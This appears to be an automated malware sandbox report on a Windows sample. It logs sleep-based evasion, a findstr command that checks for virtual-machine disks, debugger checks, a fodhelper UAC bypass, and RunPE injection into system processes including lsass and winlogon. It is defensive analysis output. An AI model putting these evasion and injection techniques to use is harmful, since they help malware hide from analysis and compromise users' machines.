Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1384 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1232 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 6412 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4948 Thread sleep count: 158 > 30
Source: C:\Windows\System32\dllhost.exe TID: 3976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3520 Thread sleep count: 251 > 30
Source: C:\Windows\System32\lsass.exe TID: 2780 Thread sleep count: 43 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8
Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: cmd.exe, 0000002C.00000003.1584622401.0000015829838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" %
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdownLMEM XlH
Source: cmd.exe, 00000008.00000003.1323937809.0000021406B8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: cmd.exe, 0000002C.00000003.1598274166.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597504148.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607297299.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1606177800.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597979208.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596938910.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597212934.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596620569.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607478751.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597899448.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1598713878.0000015829838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: e7WMhx18XN.exe, 00000001.00000002.1327169256.0000000001298000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF6CF6718E8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_004019E1 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap, 56_2_004019E1
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF671A8C SetUnhandledExceptionFilter, 12_2_00007FF6CF671A8C
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF671404 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF6CF671404
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF6CF6718E8
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\paint.exe Memory allocated: C:\Windows\System32\conhost.exe base: 113DAF00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 12BE3BE0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 21E7B340000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 236ACAA0000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 94_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\paint.exe Thread created: C:\Windows\System32\conhost.exe EIP: DAF00000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: E3BE0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 7B340000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: ACAA0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 780000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 800000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3B0000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 60382EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C7342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B91B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 918F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E962EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8D72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 56DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9CCD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BAC02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C9D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B232EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27592EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9BDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 98F62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD782EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2B82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C1332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F61C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 112C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12F62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 115C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B4692EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9EBD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6682EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 905C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5A8E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC5B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D0B72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 55302EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 95822EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 54662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83092EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB1C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CACC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6DEC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1CA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E2272EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BED2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 87922EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CCCC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 61F22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EEB32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 637D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1CC82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6EF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4B672EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30FF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E5E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 35402EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 916A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C40A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FD82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3AC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A8F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15782EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E3B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 693C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4CE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 126F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F17A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B25AC
